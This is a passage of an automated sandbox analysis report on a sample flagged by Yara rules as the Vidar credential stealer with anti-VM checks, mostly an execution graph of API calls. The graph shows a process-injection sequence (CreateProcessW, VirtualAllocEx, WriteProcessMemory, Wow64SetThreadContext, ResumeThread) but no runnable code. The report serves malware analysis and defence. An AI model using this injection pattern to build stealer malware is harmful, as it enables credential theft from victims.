                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:12.1%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:6.8%
                                                                                                                            Total number of Nodes:999
                                                                                                                            Total number of Limit Nodes:10
                                                                                                                            execution_graph 12291 6d749ef0 12318 6d749f4f std::bad_exception::bad_exception 12291->12318 12292 6d751494 12293 6d75c4d0 CatchGuardHandler 5 API calls 12292->12293 12294 6d75149e 12293->12294 12295 6d75186e GetConsoleWindow ShowWindow 12296 6d747b60 23 API calls 12295->12296 12297 6d7518a7 12296->12297 12298 6d747b60 23 API calls 12297->12298 12297->12318 12298->12297 12299 6d751377 WriteProcessMemory Wow64SetThreadContext ResumeThread 12299->12318 12300 6d74fd14 CreateProcessW 12300->12318 12301 6d751ace WriteProcessMemory 12301->12318 12302 6d7503f6 WriteProcessMemory 12302->12318 12303 6d7502b9 VirtualAllocEx 12303->12318 12304 6d751a7d VirtualAllocEx 12304->12318 12305 6d751a0e VirtualAllocEx 12305->12318 12306 6d74fa91 VirtualAlloc 12306->12318 12307 6d751465 CloseHandle 12307->12318 12308 6d751933 CreateProcessW 12308->12318 12309 6d751438 CloseHandle 12309->12318 12311 6d74fedf Wow64GetThreadContext 12311->12318 12312 6d7505ba WriteProcessMemory 12312->12318 12313 6d75119b WriteProcessMemory 12313->12318 12314 6d7500b4 VirtualAllocEx 12314->12318 12316 6d74f70b GetConsoleWindow ShowWindow 12322 6d747b60 12316->12322 12318->12292 12318->12295 12318->12299 12318->12300 12318->12301 12318->12302 12318->12303 12318->12304 12318->12305 12318->12306 12318->12307 12318->12308 12318->12309 12318->12311 12318->12312 12318->12313 12318->12314 12318->12316 12319 6d747b60 23 API calls 12318->12319 12320 6d7499b0 7 API calls 12318->12320 12321 6d7510e6 ReadProcessMemory 12318->12321 12346 6d7479c0 12318->12346 12350 6d749ce0 12318->12350 12319->12318 12320->12318 12321->12318 12327 6d747b88 __InternalCxxFrameHandler 12322->12327 12323 6d7486a6 CloseHandle 12323->12327 12324 6d748e6a CloseHandle CloseHandle 12324->12327 12325 6d748f2e CreateFileMappingA 12325->12327 12326 6d748ac4 VirtualProtect 12326->12327 12327->12323 12327->12324 12327->12325 12327->12326 12328 6d748e3d CloseHandle 12327->12328 12329 6d748265 GetModuleFileNameA 12327->12329 12330 6d748f8e CloseHandle 12327->12330 12331 6d74821d K32GetModuleInformation 12327->12331 12332 6d748462 CreateFileMappingA 12327->12332 12333 6d74882e MapViewOfFile 12327->12333 12334 6d7482a6 CreateFileA 12327->12334 12335 6d748fd3 VirtualProtect 12327->12335 12336 6d748c2c VirtualProtect 12327->12336 12337 6d748ec0 GetCurrentProcess 12327->12337 12340 6d748eac 12327->12340 12343 6d74810c GetCurrentProcess 12327->12343 12328->12327 12329->12327 12330->12327 12331->12327 12332->12327 12333->12327 12334->12327 12335->12327 12336->12327 12338 6d75d270 std::bad_exception::bad_exception 12337->12338 12339 6d748ef8 GetModuleHandleA 12338->12339 12339->12327 12341 6d75c4d0 CatchGuardHandler 5 API calls 12340->12341 12342 6d748eb6 12341->12342 12342->12318 12354 6d75d270 12343->12354 12347 6d7479e5 12346->12347 12347->12347 12348 6d75c4d0 CatchGuardHandler 5 API calls 12347->12348 12349 6d747b3b 12348->12349 12349->12318 12351 6d749d3d 12350->12351 12352 6d75c4d0 CatchGuardHandler 5 API calls 12351->12352 12353 6d749eca 12352->12353 12353->12318 12355 6d748144 GetModuleHandleA 12354->12355 12355->12327 11522 6d75c544 11523 6d75c582 11522->11523 11524 6d75c54f 11522->11524 11561 6d75c69e 11523->11561 11526 6d75c574 11524->11526 11527 6d75c554 11524->11527 11534 6d75c597 11526->11534 11529 6d75c559 11527->11529 11530 6d75c56a 11527->11530 11533 6d75c55e 11529->11533 11548 6d75cbc2 11529->11548 11553 6d75cba3 11530->11553 11535 6d75c5a3 ___scrt_is_nonwritable_in_current_image 11534->11535 11588 6d75cc33 11535->11588 11537 6d75c5aa __DllMainCRTStartup@12 11538 6d75c696 11537->11538 11539 6d75c5d1 11537->11539 11545 6d75c60d ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 11537->11545 11607 6d75cdd2 IsProcessorFeaturePresent 11538->11607 11599 6d75cb95 11539->11599 11542 6d75c69d 11543 6d75c5e0 __RTC_Initialize 11543->11545 11602 6d75cab3 InitializeSListHead 11543->11602 11545->11533 11546 6d75c5ee 11546->11545 11603 6d75cb6a 11546->11603 11699 6d761dda 11548->11699 12004 6d75f2cc 11553->12004 11556 6d75cbac 11556->11533 11559 6d75cbbf 11559->11533 11560 6d75f2d7 21 API calls 11560->11556 11562 6d75c6aa ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11561->11562 11563 6d75c746 11562->11563 11564 6d75c6db 11562->11564 11580 6d75c6b3 11562->11580 11565 6d75cdd2 __DllMainCRTStartup@12 4 API calls 11563->11565 12024 6d75cc03 11564->12024 11570 6d75c74d ___scrt_is_nonwritable_in_current_image 11565->11570 11567 6d75c6e0 12033 6d75cabf 11567->12033 11569 6d75c783 dllmain_raw 11572 6d75c79d dllmain_crt_dispatch 11569->11572 11584 6d75c769 11569->11584 11570->11569 11571 6d75c77e 11570->11571 11570->11584 12045 6d751cc0 11571->12045 11572->11571 11572->11584 11573 6d75c6e5 __RTC_Initialize __DllMainCRTStartup@12 12036 6d75cda4 11573->12036 11579 6d75c7ef 11581 6d75c7f8 dllmain_crt_dispatch 11579->11581 11579->11584 11580->11533 11582 6d75c80b dllmain_raw 11581->11582 11581->11584 11582->11584 11583 6d751cc0 __DllMainCRTStartup@12 5 API calls 11585 6d75c7d6 11583->11585 11584->11533 11586 6d75c69e __DllMainCRTStartup@12 81 API calls 11585->11586 11587 6d75c7e4 dllmain_raw 11586->11587 11587->11579 11589 6d75cc3c 11588->11589 11611 6d75cf98 IsProcessorFeaturePresent 11589->11611 11593 6d75cc4d 11598 6d75cc51 11593->11598 11621 6d761dbd 11593->11621 11596 6d75cc68 11596->11537 11598->11537 11693 6d75cc6c 11599->11693 11601 6d75cb9c 11601->11543 11602->11546 11604 6d75cb6f ___scrt_release_startup_lock 11603->11604 11605 6d75cf98 IsProcessorFeaturePresent 11604->11605 11606 6d75cb78 11604->11606 11605->11606 11606->11545 11608 6d75cde8 __InternalCxxFrameHandler std::bad_exception::bad_exception 11607->11608 11609 6d75ce93 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11608->11609 11610 6d75ced7 __InternalCxxFrameHandler 11609->11610 11610->11542 11612 6d75cc48 11611->11612 11613 6d75f2ad 11612->11613 11630 6d75f77c 11613->11630 11616 6d75f2b6 11616->11593 11618 6d75f2be 11619 6d75f2c9 11618->11619 11644 6d75f7b8 11618->11644 11619->11593 11684 6d7645ed 11621->11684 11624 6d75f2df 11625 6d75f2f2 11624->11625 11626 6d75f2e8 11624->11626 11625->11598 11627 6d75f761 ___vcrt_uninitialize_ptd 6 API calls 11626->11627 11628 6d75f2ed 11627->11628 11629 6d75f7b8 ___vcrt_uninitialize_locks DeleteCriticalSection 11628->11629 11629->11625 11631 6d75f785 11630->11631 11633 6d75f7ae 11631->11633 11635 6d75f2b2 11631->11635 11648 6d75fdac 11631->11648 11634 6d75f7b8 ___vcrt_uninitialize_locks DeleteCriticalSection 11633->11634 11634->11635 11635->11616 11636 6d75f72e 11635->11636 11665 6d75fcbd 11636->11665 11639 6d75f743 11639->11618 11642 6d75f75e 11642->11618 11645 6d75f7e2 11644->11645 11646 6d75f7c3 11644->11646 11645->11616 11647 6d75f7cd DeleteCriticalSection 11646->11647 11647->11645 11647->11647 11653 6d75fbd2 11648->11653 11651 6d75fde4 InitializeCriticalSectionAndSpinCount 11652 6d75fdcf 11651->11652 11652->11631 11654 6d75fbf3 11653->11654 11655 6d75fbef 11653->11655 11654->11655 11657 6d75fc5b GetProcAddress 11654->11657 11658 6d75fc4c 11654->11658 11660 6d75fc72 LoadLibraryExW 11654->11660 11655->11651 11655->11652 11657->11655 11658->11657 11659 6d75fc54 FreeLibrary 11658->11659 11659->11657 11661 6d75fc89 GetLastError 11660->11661 11662 6d75fcb9 11660->11662 11661->11662 11663 6d75fc94 ___vcrt_FlsFree 11661->11663 11662->11654 11663->11662 11664 6d75fcaa LoadLibraryExW 11663->11664 11664->11654 11666 6d75fbd2 ___vcrt_FlsFree 5 API calls 11665->11666 11667 6d75fcd7 11666->11667 11668 6d75fcf0 TlsAlloc 11667->11668 11669 6d75f738 11667->11669 11669->11639 11670 6d75fd6e 11669->11670 11671 6d75fbd2 ___vcrt_FlsFree 5 API calls 11670->11671 11672 6d75fd88 11671->11672 11673 6d75fda3 TlsSetValue 11672->11673 11674 6d75f751 11672->11674 11673->11674 11674->11642 11675 6d75f761 11674->11675 11676 6d75f771 11675->11676 11677 6d75f76b 11675->11677 11676->11639 11679 6d75fcf8 11677->11679 11680 6d75fbd2 ___vcrt_FlsFree 5 API calls 11679->11680 11681 6d75fd12 11680->11681 11682 6d75fd2a TlsFree 11681->11682 11683 6d75fd1e 11681->11683 11682->11683 11683->11676 11685 6d7645fd 11684->11685 11686 6d75cc5a 11684->11686 11685->11686 11688 6d7644b1 11685->11688 11686->11596 11686->11624 11690 6d7644b8 11688->11690 11689 6d7644fb GetStdHandle 11689->11690 11690->11689 11691 6d76455d 11690->11691 11692 6d76450e GetFileType 11690->11692 11691->11685 11692->11690 11694 6d75cc7c 11693->11694 11695 6d75cc78 11693->11695 11696 6d75cdd2 __DllMainCRTStartup@12 4 API calls 11694->11696 11698 6d75cc89 ___scrt_release_startup_lock 11694->11698 11695->11601 11697 6d75ccf2 11696->11697 11698->11601 11705 6d76235b 11699->11705 11702 6d75f2d7 11984 6d75f663 11702->11984 11706 6d762365 11705->11706 11709 6d75cbc7 11705->11709 11713 6d76423c 11706->11713 11709->11702 11729 6d7640da 11713->11729 11715 6d764258 11716 6d764273 TlsGetValue 11715->11716 11717 6d76236c 11715->11717 11717->11709 11718 6d76427b 11717->11718 11719 6d7640da __dosmaperr 5 API calls 11718->11719 11720 6d764297 11719->11720 11721 6d7642b5 TlsSetValue 11720->11721 11722 6d76237f 11720->11722 11723 6d762222 11722->11723 11724 6d76222d 11723->11724 11728 6d76223d 11723->11728 11743 6d762243 11724->11743 11728->11709 11730 6d76410a 11729->11730 11734 6d764106 __dosmaperr 11729->11734 11730->11734 11735 6d76400f 11730->11735 11733 6d764124 GetProcAddress 11733->11734 11734->11715 11741 6d764020 ___vcrt_FlsFree 11735->11741 11736 6d7640b6 11736->11733 11736->11734 11737 6d76403e LoadLibraryExW 11738 6d7640bd 11737->11738 11739 6d764059 GetLastError 11737->11739 11738->11736 11740 6d7640cf FreeLibrary 11738->11740 11739->11741 11740->11736 11741->11736 11741->11737 11742 6d76408c LoadLibraryExW 11741->11742 11742->11738 11742->11741 11744 6d76225e 11743->11744 11745 6d762258 11743->11745 11747 6d762800 __freea 14 API calls 11744->11747 11746 6d762800 __freea 14 API calls 11745->11746 11746->11744 11748 6d76226a 11747->11748 11749 6d762800 __freea 14 API calls 11748->11749 11750 6d762275 11749->11750 11751 6d762800 __freea 14 API calls 11750->11751 11752 6d762280 11751->11752 11753 6d762800 __freea 14 API calls 11752->11753 11754 6d76228b 11753->11754 11755 6d762800 __freea 14 API calls 11754->11755 11756 6d762296 11755->11756 11757 6d762800 __freea 14 API calls 11756->11757 11758 6d7622a1 11757->11758 11759 6d762800 __freea 14 API calls 11758->11759 11760 6d7622ac 11759->11760 11761 6d762800 __freea 14 API calls 11760->11761 11762 6d7622b7 11761->11762 11763 6d762800 __freea 14 API calls 11762->11763 11764 6d7622c5 11763->11764 11775 6d76206f 11764->11775 11769 6d762800 11770 6d76280b HeapFree 11769->11770 11771 6d762835 11769->11771 11770->11771 11772 6d762820 GetLastError 11770->11772 11771->11728 11773 6d76282d __dosmaperr 11772->11773 11915 6d762923 11773->11915 11776 6d76207b ___scrt_is_nonwritable_in_current_image 11775->11776 11791 6d762753 EnterCriticalSection 11776->11791 11778 6d7620af 11792 6d7620ce 11778->11792 11779 6d762085 11779->11778 11782 6d762800 __freea 14 API calls 11779->11782 11782->11778 11783 6d7620da 11784 6d7620e6 ___scrt_is_nonwritable_in_current_image 11783->11784 11796 6d762753 EnterCriticalSection 11784->11796 11786 6d7620f0 11797 6d762310 11786->11797 11788 6d762103 11801 6d762123 11788->11801 11791->11779 11795 6d76279b LeaveCriticalSection 11792->11795 11794 6d7620bc 11794->11783 11795->11794 11796->11786 11798 6d762346 __dosmaperr 11797->11798 11799 6d76231f __dosmaperr 11797->11799 11798->11788 11799->11798 11804 6d765070 11799->11804 11914 6d76279b LeaveCriticalSection 11801->11914 11803 6d762111 11803->11769 11805 6d7650f0 11804->11805 11808 6d765086 11804->11808 11806 6d76513e 11805->11806 11809 6d762800 __freea 14 API calls 11805->11809 11872 6d7651e1 11806->11872 11808->11805 11810 6d7650b9 11808->11810 11815 6d762800 __freea 14 API calls 11808->11815 11811 6d765112 11809->11811 11812 6d7650db 11810->11812 11821 6d762800 __freea 14 API calls 11810->11821 11813 6d762800 __freea 14 API calls 11811->11813 11814 6d762800 __freea 14 API calls 11812->11814 11816 6d765125 11813->11816 11818 6d7650e5 11814->11818 11820 6d7650ae 11815->11820 11822 6d762800 __freea 14 API calls 11816->11822 11817 6d76514c 11819 6d7651ac 11817->11819 11831 6d762800 14 API calls __freea 11817->11831 11823 6d762800 __freea 14 API calls 11818->11823 11824 6d762800 __freea 14 API calls 11819->11824 11832 6d76538d 11820->11832 11826 6d7650d0 11821->11826 11827 6d765133 11822->11827 11823->11805 11828 6d7651b2 11824->11828 11860 6d76548b 11826->11860 11830 6d762800 __freea 14 API calls 11827->11830 11828->11798 11830->11806 11831->11817 11833 6d76539e 11832->11833 11834 6d765487 11832->11834 11835 6d7653af 11833->11835 11836 6d762800 __freea 14 API calls 11833->11836 11834->11810 11837 6d7653c1 11835->11837 11838 6d762800 __freea 14 API calls 11835->11838 11836->11835 11839 6d7653d3 11837->11839 11840 6d762800 __freea 14 API calls 11837->11840 11838->11837 11841 6d7653e5 11839->11841 11842 6d762800 __freea 14 API calls 11839->11842 11840->11839 11843 6d7653f7 11841->11843 11844 6d762800 __freea 14 API calls 11841->11844 11842->11841 11845 6d765409 11843->11845 11846 6d762800 __freea 14 API calls 11843->11846 11844->11843 11847 6d76541b 11845->11847 11848 6d762800 __freea 14 API calls 11845->11848 11846->11845 11849 6d76542d 11847->11849 11850 6d762800 __freea 14 API calls 11847->11850 11848->11847 11851 6d76543f 11849->11851 11852 6d762800 __freea 14 API calls 11849->11852 11850->11849 11853 6d765451 11851->11853 11854 6d762800 __freea 14 API calls 11851->11854 11852->11851 11855 6d765463 11853->11855 11856 6d762800 __freea 14 API calls 11853->11856 11854->11853 11857 6d765475 11855->11857 11858 6d762800 __freea 14 API calls 11855->11858 11856->11855 11857->11834 11859 6d762800 __freea 14 API calls 11857->11859 11858->11857 11859->11834 11861 6d7654f0 11860->11861 11862 6d765498 11860->11862 11861->11812 11863 6d7654a8 11862->11863 11864 6d762800 __freea 14 API calls 11862->11864 11865 6d7654ba 11863->11865 11866 6d762800 __freea 14 API calls 11863->11866 11864->11863 11867 6d7654cc 11865->11867 11868 6d762800 __freea 14 API calls 11865->11868 11866->11865 11869 6d7654de 11867->11869 11870 6d762800 __freea 14 API calls 11867->11870 11868->11867 11869->11861 11871 6d762800 __freea 14 API calls 11869->11871 11870->11869 11871->11861 11873 6d7651ee 11872->11873 11874 6d76520d 11872->11874 11873->11874 11878 6d765519 11873->11878 11874->11817 11877 6d762800 __freea 14 API calls 11877->11874 11879 6d765207 11878->11879 11880 6d76552a 11878->11880 11879->11877 11881 6d7654f4 __dosmaperr 14 API calls 11880->11881 11882 6d765532 11881->11882 11883 6d7654f4 __dosmaperr 14 API calls 11882->11883 11884 6d76553d 11883->11884 11885 6d7654f4 __dosmaperr 14 API calls 11884->11885 11886 6d765548 11885->11886 11887 6d7654f4 __dosmaperr 14 API calls 11886->11887 11888 6d765553 11887->11888 11889 6d7654f4 __dosmaperr 14 API calls 11888->11889 11890 6d765561 11889->11890 11891 6d762800 __freea 14 API calls 11890->11891 11892 6d76556c 11891->11892 11893 6d762800 __freea 14 API calls 11892->11893 11894 6d765577 11893->11894 11895 6d762800 __freea 14 API calls 11894->11895 11896 6d765582 11895->11896 11897 6d7654f4 __dosmaperr 14 API calls 11896->11897 11898 6d765590 11897->11898 11899 6d7654f4 __dosmaperr 14 API calls 11898->11899 11900 6d76559e 11899->11900 11901 6d7654f4 __dosmaperr 14 API calls 11900->11901 11902 6d7655af 11901->11902 11903 6d7654f4 __dosmaperr 14 API calls 11902->11903 11904 6d7655bd 11903->11904 11905 6d7654f4 __dosmaperr 14 API calls 11904->11905 11906 6d7655cb 11905->11906 11907 6d762800 __freea 14 API calls 11906->11907 11908 6d7655d6 11907->11908 11909 6d762800 __freea 14 API calls 11908->11909 11910 6d7655e1 11909->11910 11911 6d762800 __freea 14 API calls 11910->11911 11912 6d7655ec 11911->11912 11913 6d762800 __freea 14 API calls 11912->11913 11913->11879 11914->11803 11918 6d7624d8 GetLastError 11915->11918 11917 6d762928 11917->11771 11919 6d7624ee 11918->11919 11922 6d7624f4 11918->11922 11920 6d76423c __dosmaperr 6 API calls 11919->11920 11920->11922 11921 6d76427b __dosmaperr 6 API calls 11923 6d762510 11921->11923 11922->11921 11939 6d7624f8 SetLastError 11922->11939 11923->11939 11941 6d762936 11923->11941 11927 6d76253e 11930 6d76427b __dosmaperr 6 API calls 11927->11930 11928 6d76252d 11929 6d76427b __dosmaperr 6 API calls 11928->11929 11931 6d76253b 11929->11931 11932 6d76254a 11930->11932 11937 6d762800 __freea 12 API calls 11931->11937 11933 6d762565 11932->11933 11934 6d76254e 11932->11934 11948 6d762189 11933->11948 11936 6d76427b __dosmaperr 6 API calls 11934->11936 11936->11931 11937->11939 11939->11917 11940 6d762800 __freea 12 API calls 11940->11939 11946 6d762943 __dosmaperr 11941->11946 11942 6d762983 11945 6d762923 __dosmaperr 13 API calls 11942->11945 11943 6d76296e HeapAlloc 11944 6d762525 11943->11944 11943->11946 11944->11927 11944->11928 11945->11944 11946->11942 11946->11943 11953 6d761085 11946->11953 11962 6d76201d 11948->11962 11956 6d7610b1 11953->11956 11957 6d7610bd ___scrt_is_nonwritable_in_current_image 11956->11957 11958 6d762753 __InternalCxxFrameHandler EnterCriticalSection 11957->11958 11959 6d7610c8 __InternalCxxFrameHandler 11958->11959 11960 6d7610ff __dosmaperr LeaveCriticalSection 11959->11960 11961 6d761090 11960->11961 11961->11946 11963 6d762029 ___scrt_is_nonwritable_in_current_image 11962->11963 11976 6d762753 EnterCriticalSection 11963->11976 11965 6d762033 11977 6d762063 11965->11977 11968 6d76212f 11969 6d76213b ___scrt_is_nonwritable_in_current_image 11968->11969 11980 6d762753 EnterCriticalSection 11969->11980 11971 6d762145 11972 6d762310 __dosmaperr 14 API calls 11971->11972 11973 6d76215d 11972->11973 11981 6d76217d 11973->11981 11976->11965 11978 6d76279b __InternalCxxFrameHandler LeaveCriticalSection 11977->11978 11979 6d762051 11978->11979 11979->11968 11980->11971 11982 6d76279b __InternalCxxFrameHandler LeaveCriticalSection 11981->11982 11983 6d76216b 11982->11983 11983->11940 11985 6d75f66d 11984->11985 11991 6d75cbcc 11984->11991 11992 6d75fd33 11985->11992 11988 6d75fd6e ___vcrt_FlsSetValue 6 API calls 11989 6d75f683 11988->11989 11997 6d75f647 11989->11997 11991->11533 11993 6d75fbd2 ___vcrt_FlsFree 5 API calls 11992->11993 11994 6d75fd4d 11993->11994 11995 6d75fd65 TlsGetValue 11994->11995 11996 6d75f674 11994->11996 11995->11996 11996->11988 11998 6d75f651 11997->11998 11999 6d75f65e 11997->11999 11998->11999 12001 6d761113 11998->12001 11999->11991 12002 6d762800 __freea 14 API calls 12001->12002 12003 6d76112b 12002->12003 12003->11999 12010 6d75f69c 12004->12010 12006 6d75cba8 12006->11556 12007 6d761dcf 12006->12007 12008 6d7624d8 __dosmaperr 14 API calls 12007->12008 12009 6d75cbb4 12008->12009 12009->11559 12009->11560 12011 6d75f6a5 12010->12011 12012 6d75f6a8 GetLastError 12010->12012 12011->12006 12013 6d75fd33 ___vcrt_FlsGetValue 6 API calls 12012->12013 12014 6d75f6bd 12013->12014 12015 6d75f722 SetLastError 12014->12015 12016 6d75fd6e ___vcrt_FlsSetValue 6 API calls 12014->12016 12023 6d75f6dc 12014->12023 12015->12006 12017 6d75f6d6 __InternalCxxFrameHandler 12016->12017 12018 6d75f6fe 12017->12018 12019 6d75fd6e ___vcrt_FlsSetValue 6 API calls 12017->12019 12017->12023 12020 6d75fd6e ___vcrt_FlsSetValue 6 API calls 12018->12020 12021 6d75f712 12018->12021 12019->12018 12020->12021 12022 6d761113 ___std_type_info_destroy_list 14 API calls 12021->12022 12022->12023 12023->12015 12025 6d75cc08 ___scrt_release_startup_lock 12024->12025 12026 6d75cc0c 12025->12026 12029 6d75cc18 __DllMainCRTStartup@12 12025->12029 12049 6d761c39 12026->12049 12028 6d75cc16 12028->11567 12030 6d75cc25 12029->12030 12053 6d761422 12029->12053 12030->11567 12122 6d75f28a InterlockedFlushSList 12033->12122 12037 6d75cdb0 12036->12037 12038 6d75c704 12037->12038 12126 6d761de2 12037->12126 12042 6d75c740 12038->12042 12040 6d75cdbe 12041 6d75f2df ___scrt_uninitialize_crt 7 API calls 12040->12041 12041->12038 12240 6d75cc26 12042->12240 12046 6d751d24 12045->12046 12257 6d75c4d0 12046->12257 12048 6d752696 12048->11579 12048->11583 12050 6d761c45 __EH_prolog3 12049->12050 12064 6d761b04 12050->12064 12052 6d761c6c __DllMainCRTStartup@12 12052->12028 12054 6d76144f 12053->12054 12062 6d761460 12053->12062 12081 6d7614ea GetModuleHandleW 12054->12081 12059 6d76149e 12059->11567 12088 6d7612ed 12062->12088 12065 6d761b10 ___scrt_is_nonwritable_in_current_image 12064->12065 12072 6d762753 EnterCriticalSection 12065->12072 12067 6d761b1e 12073 6d761b5f 12067->12073 12072->12067 12074 6d761b2b 12073->12074 12075 6d761b7e 12073->12075 12077 6d761b53 12074->12077 12075->12074 12076 6d762800 __freea 14 API calls 12075->12076 12076->12074 12080 6d76279b LeaveCriticalSection 12077->12080 12079 6d761b3c 12079->12052 12080->12079 12082 6d761454 12081->12082 12082->12062 12083 6d761545 GetModuleHandleExW 12082->12083 12084 6d761584 GetProcAddress 12083->12084 12085 6d761598 12083->12085 12084->12085 12086 6d7615b4 12085->12086 12087 6d7615ab FreeLibrary 12085->12087 12086->12062 12087->12086 12089 6d7612f9 ___scrt_is_nonwritable_in_current_image 12088->12089 12103 6d762753 EnterCriticalSection 12089->12103 12091 6d761303 12104 6d76133a 12091->12104 12093 6d761310 12108 6d76132e 12093->12108 12096 6d7614b9 12112 6d76152c 12096->12112 12098 6d7614c3 12099 6d7614d7 12098->12099 12100 6d7614c7 GetCurrentProcess TerminateProcess 12098->12100 12101 6d761545 __InternalCxxFrameHandler 3 API calls 12099->12101 12100->12099 12102 6d7614df ExitProcess 12101->12102 12103->12091 12105 6d761346 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 12104->12105 12106 6d761c39 __DllMainCRTStartup@12 14 API calls 12105->12106 12107 6d7613aa __InternalCxxFrameHandler 12105->12107 12106->12107 12107->12093 12111 6d76279b LeaveCriticalSection 12108->12111 12110 6d76131c 12110->12059 12110->12096 12111->12110 12115 6d76285f 12112->12115 12114 6d761531 __InternalCxxFrameHandler 12114->12098 12116 6d76286e __InternalCxxFrameHandler 12115->12116 12117 6d76287b 12116->12117 12119 6d76415f 12116->12119 12117->12114 12120 6d7640da __dosmaperr 5 API calls 12119->12120 12121 6d76417b 12120->12121 12121->12117 12123 6d75f29a 12122->12123 12125 6d75cac9 12122->12125 12124 6d761113 ___std_type_info_destroy_list 14 API calls 12123->12124 12123->12125 12124->12123 12125->11573 12127 6d761ded 12126->12127 12128 6d761dff ___scrt_uninitialize_crt 12126->12128 12129 6d761dfb 12127->12129 12131 6d764c98 12127->12131 12128->12040 12129->12040 12134 6d764b29 12131->12134 12137 6d764a7d 12134->12137 12138 6d764a89 ___scrt_is_nonwritable_in_current_image 12137->12138 12145 6d762753 EnterCriticalSection 12138->12145 12140 6d764aff 12154 6d764b1d 12140->12154 12143 6d764a93 ___scrt_uninitialize_crt 12143->12140 12146 6d7649f1 12143->12146 12145->12143 12147 6d7649fd ___scrt_is_nonwritable_in_current_image 12146->12147 12157 6d764db5 EnterCriticalSection 12147->12157 12149 6d764a40 12171 6d764a71 12149->12171 12150 6d764a07 ___scrt_uninitialize_crt 12150->12149 12158 6d764c33 12150->12158 12239 6d76279b LeaveCriticalSection 12154->12239 12156 6d764b0b 12156->12129 12157->12150 12159 6d764c48 ___std_exception_copy 12158->12159 12160 6d764c4f 12159->12160 12161 6d764c5a 12159->12161 12163 6d764b29 ___scrt_uninitialize_crt 68 API calls 12160->12163 12174 6d764bca 12161->12174 12164 6d764c55 12163->12164 12198 6d760ca4 12164->12198 12169 6d764c7b 12187 6d766454 12169->12187 12238 6d764dc9 LeaveCriticalSection 12171->12238 12173 6d764a5f 12173->12143 12175 6d764be3 12174->12175 12179 6d764c0a 12174->12179 12176 6d764fcc ___scrt_uninitialize_crt 39 API calls 12175->12176 12175->12179 12177 6d764bff 12176->12177 12204 6d766c73 12177->12204 12179->12164 12180 6d764fcc 12179->12180 12181 6d764fed 12180->12181 12182 6d764fd8 12180->12182 12181->12169 12183 6d762923 __dosmaperr 14 API calls 12182->12183 12184 6d764fdd 12183->12184 12215 6d760f68 12184->12215 12188 6d766465 12187->12188 12192 6d766472 12187->12192 12189 6d762923 __dosmaperr 14 API calls 12188->12189 12197 6d76646a 12189->12197 12190 6d7664bb 12191 6d762923 __dosmaperr 14 API calls 12190->12191 12194 6d7664c0 12191->12194 12192->12190 12193 6d766499 12192->12193 12218 6d7663b2 12193->12218 12196 6d760f68 ___std_exception_copy 39 API calls 12194->12196 12196->12197 12197->12164 12199 6d760cb0 12198->12199 12200 6d760cc7 12199->12200 12231 6d760d4f 12199->12231 12201 6d760cda 12200->12201 12203 6d760d4f ___std_exception_copy 39 API calls 12200->12203 12201->12149 12203->12201 12205 6d766c7f ___scrt_is_nonwritable_in_current_image 12204->12205 12206 6d766cc0 12205->12206 12207 6d766d06 12205->12207 12214 6d766c87 12205->12214 12208 6d760eeb ___std_exception_copy 39 API calls 12206->12208 12209 6d766271 ___scrt_uninitialize_crt EnterCriticalSection 12207->12209 12208->12214 12210 6d766d0c 12209->12210 12211 6d766d2a 12210->12211 12212 6d766d84 ___scrt_uninitialize_crt 62 API calls 12210->12212 12213 6d766d7c ___scrt_uninitialize_crt LeaveCriticalSection 12211->12213 12212->12211 12213->12214 12214->12179 12216 6d760eb4 ___std_exception_copy 39 API calls 12215->12216 12217 6d760f74 12216->12217 12217->12169 12219 6d7663be ___scrt_is_nonwritable_in_current_image 12218->12219 12220 6d766271 ___scrt_uninitialize_crt EnterCriticalSection 12219->12220 12222 6d7663cd 12220->12222 12221 6d766412 12224 6d762923 __dosmaperr 14 API calls 12221->12224 12222->12221 12223 6d766348 ___scrt_uninitialize_crt 39 API calls 12222->12223 12225 6d7663f9 FlushFileBuffers 12223->12225 12226 6d766419 12224->12226 12225->12226 12227 6d766405 GetLastError 12225->12227 12229 6d766448 ___scrt_uninitialize_crt LeaveCriticalSection 12226->12229 12228 6d762910 __dosmaperr 14 API calls 12227->12228 12228->12221 12230 6d766431 12229->12230 12230->12197 12232 6d760d62 12231->12232 12233 6d760d59 12231->12233 12232->12200 12234 6d760d09 ___std_exception_copy 16 API calls 12233->12234 12235 6d760d5e 12234->12235 12235->12232 12236 6d761eba CallUnexpected 39 API calls 12235->12236 12237 6d760d6b 12236->12237 12238->12173 12239->12156 12245 6d761e12 12240->12245 12243 6d75f761 ___vcrt_uninitialize_ptd 6 API calls 12244 6d75c745 12243->12244 12244->11580 12248 6d762658 12245->12248 12249 6d762662 12248->12249 12250 6d75cc2d 12248->12250 12252 6d7641fd 12249->12252 12250->12243 12253 6d7640da __dosmaperr 5 API calls 12252->12253 12254 6d764219 12253->12254 12255 6d764234 TlsFree 12254->12255 12256 6d764222 12254->12256 12256->12250 12258 6d75c4d9 IsProcessorFeaturePresent 12257->12258 12259 6d75c4d8 12257->12259 12261 6d75c8e4 12258->12261 12259->12048 12264 6d75c8a7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12261->12264 12263 6d75c9c7 12263->12048 12264->12263 12265 6d75c884 12266 6d75c892 12265->12266 12267 6d75c88d 12265->12267 12271 6d75c74e 12266->12271 12286 6d75ca68 12267->12286 12273 